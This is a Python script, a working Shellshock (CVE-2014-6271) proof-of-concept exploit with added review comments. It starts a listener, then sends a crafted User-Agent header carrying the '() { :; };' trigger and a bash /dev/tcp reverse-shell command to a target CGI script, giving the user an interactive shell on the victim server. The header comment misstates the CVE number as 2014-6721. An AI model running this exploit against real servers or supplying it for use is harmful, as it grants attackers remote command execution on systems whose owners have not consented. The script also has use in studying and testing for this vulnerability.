import requests
import socket
import argparse
import subprocess
import sys
from requests import get
from requests.exceptions import ChunkedEncodingError
import threading
from time import sleep
# CVE-2014-6721 - Shellshock POC exploit
# In this code, we are doing a few things. First, we are receiving the required arguments from the user,
# including the target url of the vulnerable cgi script, and the listening ip address and port for
# capturing the reverse shell. Then, we create a listening socket that will function as the actual reverse shell in the program.
# After that, we are sending a GET request with a specially crafted User-Agent header, that will cause an RCE in the server,
# and will send the connection back to our listening socket, as a reverse shell.
# Receiving required arguments from the user:
def GetArguments():
    """Parse the command line and return ``(url, lhost, port)``.

    All three options are mandatory: ``-u/--url`` (str), ``-l/--lhost`` (str)
    and ``-p/--port`` (int). ``argparse`` exits the process on its own when an
    option is missing or ``--port`` is not an integer, so nothing is raised
    to the caller.
    """
    arg_parser = argparse.ArgumentParser(
        description="Shellshock Vulnerability exploit (cve-2014-6271)"
    )
    mandatory = arg_parser.add_argument_group("required arguments")
    # (flags, value type, help text) for each mandatory option, in the
    # order they are listed in the usage line.
    option_specs = [
        (("-u", "--url"), str,
         'target url of cgi script (example: http://www.domain.com/cgi-bin/script.cgi)'),
        (("-l", "--lhost"), str,
         'listening ip address for capturing the reverse shell'),
        (("-p", "--port"), int,
         'listening port for capturing the reverse shell'),
    ]
    for flags, value_type, help_text in option_specs:
        mandatory.add_argument(*flags, type=value_type, help=help_text, required=True)
    parsed = arg_parser.parse_args()
    return parsed.url, parsed.lhost, parsed.port
# Creating the listening socket that will function later as the reverse shell:
def reverse_shell():
    """Listen on ``(lhost, port)`` for one inbound connection and relay it to the terminal.

    Takes no parameters and returns nothing. Reads the module-level globals
    ``lhost`` and ``port`` (assigned at the bottom of the file from
    ``GetArguments()``). The main script runs this in a background thread.
    """
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.bind((lhost,port))
        s.listen(1)  # backlog of one: only a single connection is ever accepted
        print("[*] listening on port: {0}...".format(port))
        conn,addr = s.accept()  # blocks until a peer connects
        print("[*] received connection from {0}".format(addr))
        while True:
            # NOTE(review): an empty recv() (peer closed the connection) is not
            # detected here, so a dropped connection leaves this loop blocking in input().
            output=conn.recv(2048).decode()
            sys.stdout.write(output)
            cmd=input()+"\n"
            # NOTE(review): because of the newline appended just above, this
            # comparison can never be true; "exit" is forwarded to the peer instead.
            if(cmd=="exit"):
                conn.close()
                s.close()
                break
            conn.send(cmd.encode())
            sleep(1)
            # "\033[A" moves the cursor up one line before re-printing the last
            # line of the previous output (presumably the remote prompt).
            sys.stdout.write("\033[A"+output.split("\n")[-1])
    except KeyboardInterrupt:
        # NOTE(review): KeyboardInterrupt is normally delivered to the main
        # thread only, so this handler is unlikely to run when the function
        # executes in the worker thread; if it did run before accept() returned,
        # ``conn`` would be unbound here.
        conn.close()
        s.close()
        quit()
# Calling the functions "GetArguments" and "reverse_shell", and after
# that sending the GET request with the crafted User-Agent header:
# Script entry point: runs at import time (there is no ``if __name__ == "__main__"`` guard).
try:
    url,lhost,port = GetArguments()  # also sets the globals reverse_shell() reads
    # Non-daemon thread: if the request below raises, the listener thread
    # still keeps the process alive until it is interrupted.
    t = threading.Thread(target=reverse_shell, args=())
    t.start()
    sleep(2)  # fixed delay, presumably to let the listener bind before the request goes out
    #this is the part of crafting and sending the GET request:
    cmd="'bash -i >&/dev/tcp/{0}/{1} 0>&1'".format(lhost,port)
    # The "() { :; };" prefix is the Shellshock trigger pattern (the file header
    # and the parser description disagree on the CVE number). For defenders,
    # this literal prefix in a request header is the signature to alert on.
    user_agent= {"User-Agent":"() { :; };echo; echo; /bin/bash -c "+cmd}
    request=requests.get(url,headers=user_agent)  # the response object is never used
except ChunkedEncodingError:
    # NOTE(review): swallowed silently; this is raised when the HTTP response
    # body ends early, and nothing is reported to the user.
    pass
except KeyboardInterrupt:
    quit()